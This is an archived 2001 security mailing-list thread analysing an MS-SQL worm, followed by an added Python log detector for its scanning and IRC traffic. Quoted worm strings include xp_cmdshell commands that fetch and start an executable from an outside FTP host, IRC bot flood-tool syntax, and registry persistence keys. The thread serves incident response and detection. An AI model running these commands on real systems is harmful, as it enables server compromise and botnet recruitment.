Re: MS-SQL Worm?

From: Johannes Verelst (incidentsat_private)
Date: Tue Nov 20 2001 - 11:11:20 PST


    On Tue, 20 Nov 2001, Patrick Andry wrote:
    
    > Apparently the file is no longer available on the ftp server.
    > Hopefully this worm is short-lived.
    
    The strange thing about this 'worm' is that it is totally dependent on
    several central servers. Firstly, the FTP server where the files are
    retrieved, secondly the IRC server (that has been slashdotted now
    apparently).
    
    With Nimda, the tftp transfer was made from the infected to the infecting
    host. I am not trying to give advice on writing worms, but that is
    obviously a much better design. This worm will not spread massively since
    the servers it is dependent on are down within hours.
    
    Just my 2 eurocents,
    
    Johannes
    
    > Arthur Donkers wrote:
    >
    > >Hi All,
    > >
    > >Analysed it a bit further (thanks to VMware and netmonitor) and
    > >once it is started it connects to an irc server at bots.kujikiri.net,
    > >port 6669. From the rest of the capture it seems it drops a message
    > >there with the name of the machine it compromised and a password
    > >like string.
    > >
    > >It furthermore (see strings output on executable, scan for registry
    > >keys) adds itself to the Run entry in the registry so it is started
    > >each time the machine is booted. A few of the registry keys:
    > >
    > >
    > >SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg
    > >
    > >SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder
    > >
    > >SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY
    > >
    > >From the strings output it seems to contain a scanner (sm6 ..) that
    > >will scan for new vulnerable machines. I'm not quite sure if and so,
    > >how, it is controlled from the IRC channel. I've tested it on our
    > >testing network so I'm not quite sure yet.
    > >
    > >I've attached the netmon capture file to this message.
    > >
    > >grtz,
    > >
    > >Arthur
    > >
    > >On Tue, 20 Nov 2001, Paul Nasrat wrote:
    > >
    > >>On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:
    > >>
    > >>>We saw a scan come in looking for systems answering on 1433, and
    > >>>immediately saw several systems start scanning out for other systems
    > >>>answering on 1433 - worm behavior?  Has anyone else seen this?
    > >>>
    > >>No, but the binaries it downloads:
    > >>
    > >>win32mon.exe and dnsservice.exe
    > >>
    > >>Are on the ftp site in the dump.  I don't have a windows debugger to put
    > >>them through but they look interesting:
    > >>
    > >>exec xp_cmdshell 'start dnsservice.exe'
    > >>exec xp_cmdshell 'del ftp.x'
    > >>exec xp_cmdshell 'ftp -s:ftp.x
    > >>exec xp_cmdshell 'echo quit >> ftp.x'
    > >>exec xp_cmdshell 'echo close >> ftp.x'
    > >>exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
    > >>exec xp_cmdshell 'echo cd tmp>> ftp.x'
    > >>exec xp_cmdshell 'echo cd pub>> ftp.x'
    > >>exec xp_cmdshell 'echo bin>> ftp.x'
    > >>exec xp_cmdshell 'echo foo.com>> ftp.x'
    > >>exec xp_cmdshell 'echo ftp> ftp.x'
    > >>
    > >>GET /%s HTTP/1.0
    > >>Connection: Keep-Alive
    > >>User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
    > >>[GET] - Unable to connect to http.
    > >>[GET] - Unable to resolve host.
    > >>http://
    > >>[GET] - Unable to create new socket.
    > >>GET <bot|wildcard> <host> <save as>
    > >>%s %s %s %s
    > >>NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu)
    > >>NICK %s
    > >>NOTICE %s :Nick cannot be larger than 9 characters.
    > >>NOTICE %s :NICK <nick>
    > >>sm6 has finished...
    > >>with tcp/syn boost!
    > >>sm6 icmp/udp has begun...
    > >>sm6 icmp/udp (w/pkt-push!) has begun..
    > >>Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src
    > >>port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t
    > >>include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file>
    > >>
    > >>etc.
    > >>
    > >>Paul Nasrat
    > >>
    > >>----------------------------------------------------------------------------
    > >>This list is provided by the SecurityFocus ARIS analyzer service.
    > >>For more information on this free incident handling, management
    > >>and tracking system please see: http://aris.securityfocus.com
    > >>
    
    -- 
    "Programming today is a race between software engineers striving to build
    bigger and better idiot-proof programs, and the Universe trying to produce
    bigger and better idiots. So far, the Universe is winning."
    
    
    
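The two behaviours reported in this thread (a host probed on tcp/1433 that immediately starts scanning other hosts on 1433, and the outbound IRC connection to port 6669) can both be picked out of ordinary firewall connection logs. The detector below is an added example, not code from the thread; it runs over a constructed log in an assumed `<epoch> <action> <proto> <src>:<sport> -> <dst>:<dport>` format, and all addresses and timestamps are made up.

```python
import re
from collections import defaultdict
# Constructed sample firewall log (assumed "<epoch> <action> <proto> <src>:<sport> -> <dst>:<dport>" format; not from the thread)
SAMPLE_LOG = """\
1006271658 ACCEPT tcp 203.0.113.9:3422 -> 192.0.2.10:1433
1006271660 ACCEPT tcp 192.0.2.10:1051 -> 198.51.100.5:6669
1006271661 ACCEPT tcp 192.0.2.10:1052 -> 10.0.0.1:1433
1006271661 ACCEPT tcp 192.0.2.10:1053 -> 10.0.0.2:1433
1006271662 ACCEPT tcp 192.0.2.10:1054 -> 10.0.0.3:1433
1006271662 DROP tcp 192.0.2.10:1055 -> 10.0.0.4:1433
1006271663 DROP tcp 192.0.2.10:1056 -> 10.0.0.5:1433
1006271700 ACCEPT tcp 192.0.2.20:2000 -> 192.0.2.30:1433
"""
LINE_RE = re.compile(r"^(?P<ts>\d+) (?P<action>\w+) (?P<proto>\w+) "
                     r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
SQL_PORT, IRC_PORT = 1433, 6669   # MS-SQL port and the IRC port seen in the netmon capture
FANOUT_MIN, WINDOW = 5, 60        # distinct tcp/1433 targets within WINDOW seconds => scanning

def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            for key in ("ts", "sport", "dport"):
                rec[key] = int(rec[key])
            yield rec

def find_suspects(text):
    """Return {host: [reasons]} for hosts showing the worm's traffic pattern."""
    probed_at = {}               # host -> ts of first inbound tcp/1433 connection
    targets = defaultdict(list)  # host -> [(ts, dst)] for its outbound tcp/1433
    reasons = defaultdict(list)
    for r in parse_log(text):
        if r["proto"] != "tcp":
            continue
        if r["dport"] == SQL_PORT:       # DROPs count too: scans hit unused address space
            probed_at.setdefault(r["dst"], r["ts"])
            targets[r["src"]].append((r["ts"], r["dst"]))
        elif r["dport"] == IRC_PORT:
            reasons[r["src"]].append(f"outbound IRC to {r['dst']}:{IRC_PORT}")
    for host, hits in targets.items():
        for i, (t0, _) in enumerate(hits):  # sliding window over this host's 1433 connections
            distinct = {d for t, d in hits[i:] if t - t0 <= WINDOW}
            if len(distinct) >= FANOUT_MIN:
                note = f"{len(distinct)} distinct tcp/{SQL_PORT} targets within {WINDOW}s"
                if host in probed_at and probed_at[host] <= t0:
                    note += " after being probed on the same port"
                reasons[host].append(note)
                break
    return dict(reasons)
```

The sample flags only 192.0.2.10, which was probed on 1433, then contacted the IRC port and fanned out to five 1433 targets; the single benign SQL connection from 192.0.2.20 stays below the threshold.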



    This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:15:21 PST